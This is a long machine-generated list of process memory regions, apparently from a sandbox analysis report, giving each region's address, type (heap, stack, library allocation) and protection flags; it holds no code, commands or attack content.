trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45DE000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45D6000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C43DF000
heap
page read and write
229C45C5000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43C5000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
86A91FE000
stack
page read and write
229AD513000
trusted library allocation
page read and write
229C4330000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229ABCC4000
heap
page read and write
7FF9A5A30000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281D1CC7000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229ABC94000
heap
page read and write
281D2220000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C49D0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229AA1E4000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229AA258000
heap
page read and write
229C45C3000
trusted library allocation
page read and write
229AA270000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
281D1E00000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A58E0000
trusted library allocation
page read and write
281B9610000
trusted library allocation
page read and write
281B9CBD000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
7FF9A5A50000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
281D1E10000
heap
page execute and read and write
281B7BF2000
heap
page read and write
229C4A30000
trusted library allocation
page read and write
7FF9A5A13000
trusted library allocation
page read and write
281B9770000
heap
page read and write
229C45B3000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
D3B72BF000
stack
page read and write
7DF47C630000
trusted library allocation
page execute and read and write
229C4411000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45CC000
trusted library allocation
page read and write
229C43F7000
heap
page read and write
281D1C53000
heap
page read and write
229C4934000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229ABC99000
heap
page read and write
229ACF50000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
86A977E000
stack
page read and write
229C4920000
trusted library allocation
page read and write
281BA09C000
trusted library allocation
page read and write
229C45C1000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A5900000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C49A0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
7FF9A55C0000
trusted library allocation
page read and write
229C45BE000
trusted library allocation
page read and write
229ACF10000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C45A1000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229BC498000
trusted library allocation
page read and write
281BA16E000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
281D1C5F000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229ACB5F000
trusted library allocation
page read and write
281B9C10000
heap
page execute and read and write
229BC1D1000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229ABD04000
heap
page read and write
229ACC4E000
trusted library allocation
page read and write
229C43C5000
heap
page read and write
229C4431000
heap
page read and write
7FF9A59CC000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
7FF9A579D000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C4350000
heap
page execute and read and write
229ACF63000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229ABCA5000
heap
page read and write
229C4341000
trusted library allocation
page read and write
229C4A04000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281D1D15000
heap
page read and write
229C434A000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C49F0000
trusted library allocation
page read and write
229ACFE6000
trusted library allocation
page read and write
7FF9A5BA2000
trusted library allocation
page read and write
229C4964000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
7FF9A5880000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C4560000
heap
page read and write
229C4340000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ACF20000
trusted library allocation
page read and write
229ACCF5000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4999000
trusted library allocation
page read and write
229C44DB000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229ACC0B000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B8000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45CC000
trusted library allocation
page read and write
229C45BC000
trusted library allocation
page read and write
7FF9A5B20000
trusted library allocation
page execute and read and write
229C45C0000
trusted library allocation
page read and write
229AD6E3000
trusted library allocation
page read and write
229AA370000
heap
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A5660000
trusted library allocation
page read and write
229C4344000
trusted library allocation
page read and write
229ACFCC000
trusted library allocation
page read and write
229AD34E000
trusted library allocation
page read and write
229C493A000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AD861000
trusted library allocation
page read and write
7FF9A5990000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4343000
trusted library allocation
page read and write
229C45DE000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4928000
trusted library allocation
page read and write
229C43E7000
heap
page read and write
229C45D3000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
281B95F0000
trusted library allocation
page read and write
281D1C87000
heap
page read and write
229AD0B1000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281D1C38000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4932000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45B6000
trusted library allocation
page read and write
229ACF4E000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43DF000
heap
page read and write
229C45C4000
trusted library allocation
page read and write
229AD601000
trusted library allocation
page read and write
229C4343000
trusted library allocation
page read and write
D3B70B8000
stack
page read and write
229ABD0E000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45DC000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229ABCF4000
heap
page read and write
281BA073000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
229C4344000
trusted library allocation
page read and write
229C45C2000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
281BA189000
trusted library allocation
page read and write
229AD5BC000
trusted library allocation
page read and write
281D2140000
heap
page read and write
229C49F0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
D3B6E7F000
stack
page read and write
229C444D000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A5A89000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C44CF000
heap
page read and write
229C434A000
trusted library allocation
page read and write
229C439A000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45D4000
trusted library allocation
page read and write
229C4496000
heap
page read and write
7FF9A57B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4922000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B5000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45BB000
trusted library allocation
page read and write
229C44AB000
heap
page read and write
229C4390000
trusted library allocation
page read and write
7FF9A58D0000
trusted library allocation
page read and write
229AD043000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C43FF000
heap
page read and write
229C43D1000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229AD19F000
trusted library allocation
page read and write
229C447F000
heap
page read and write
229C43F2000
heap
page read and write
7FF9A560B000
trusted library allocation
page execute and read and write
229C4564000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281BA057000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A55F0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4965000
trusted library allocation
page read and write
229ACF99000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
281B9C8C000
trusted library allocation
page read and write
229C49D0000
trusted library allocation
page read and write
229C45D6000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4936000
trusted library allocation
page read and write
7FF9A59D0000
trusted library allocation
page read and write
229C448F000
heap
page read and write
229C44DB000
heap
page read and write
229ACBD4000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A55FD000
trusted library allocation
page execute and read and write
229C45C9000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C43B6000
heap
page read and write
7FF9A5AE0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4374000
trusted library allocation
page read and write
7FF9A55C3000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A5870000
trusted library allocation
page read and write
7FF9A57C2000
trusted library allocation
page read and write
7FF9A5780000
trusted library allocation
page read and write
229ACFD5000
trusted library allocation
page read and write
229AD6F1000
trusted library allocation
page read and write
7FF9A5780000
trusted library allocation
page execute and read and write
229C49E0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4403000
heap
page read and write
229C4370000
trusted library allocation
page read and write
229C4A30000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
86A96FE000
stack
page read and write
7FF9A57F0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C49B0000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C4937000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4370000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4417000
heap
page read and write
229C4921000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C49E0000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AD6C1000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229AD89E000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
229C43EF000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C44C9000
heap
page read and write
229C4495000
heap
page read and write
229AA209000
heap
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A58A0000
trusted library allocation
page read and write
229ACF32000
trusted library allocation
page read and write
7FF9A5B00000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A55B0000
trusted library allocation
page read and write
281D1C66000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229BC3C5000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4418000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229ABCBB000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4A20000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4550000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229ACB78000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
281BA0FD000
trusted library allocation
page read and write
229ABCD9000
heap
page read and write
D3B6DFE000
stack
page read and write
229C45C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281D1E00000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A58B0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229AD0B9000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
281B9C31000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
281D1C76000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229ACFDE000
trusted library allocation
page read and write
229AC064000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C43D0000
heap
page read and write
229C4425000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
281D1C6A000
heap
page read and write
229C439A000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ACBAB000
trusted library allocation
page read and write
7DF4BEF40000
trusted library allocation
page execute and read and write
229C4936000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C49A0000
trusted library allocation
page read and write
229ACA94000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
281B7BE0000
heap
page read and write
229C45B1000
trusted library allocation
page read and write
229C4342000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C43F6000
heap
page read and write
229C4340000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C458E000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A5696000
trusted library allocation
page execute and read and write
229C45B0000
trusted library allocation
page read and write
229C43FF000
heap
page read and write
229C45B6000
trusted library allocation
page read and write
229AD86A000
trusted library allocation
page read and write
281D1CB4000
heap
page read and write
229C46E0000
heap
page read and write
229C439A000
trusted library allocation
page read and write
281B9D11000
trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
281B9D96000
trusted library allocation
page read and write
229ACE7C000
trusted library allocation
page read and write
229C44DE000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C43C3000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229ABCCA000
heap
page read and write
D3B7DCC000
stack
page read and write
229C45C0000
trusted library allocation
page read and write
229C4932000
trusted library allocation
page read and write
229C4416000
heap
page read and write
229BC3CF000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
There are 1714 hidden memdumps, click here to show them.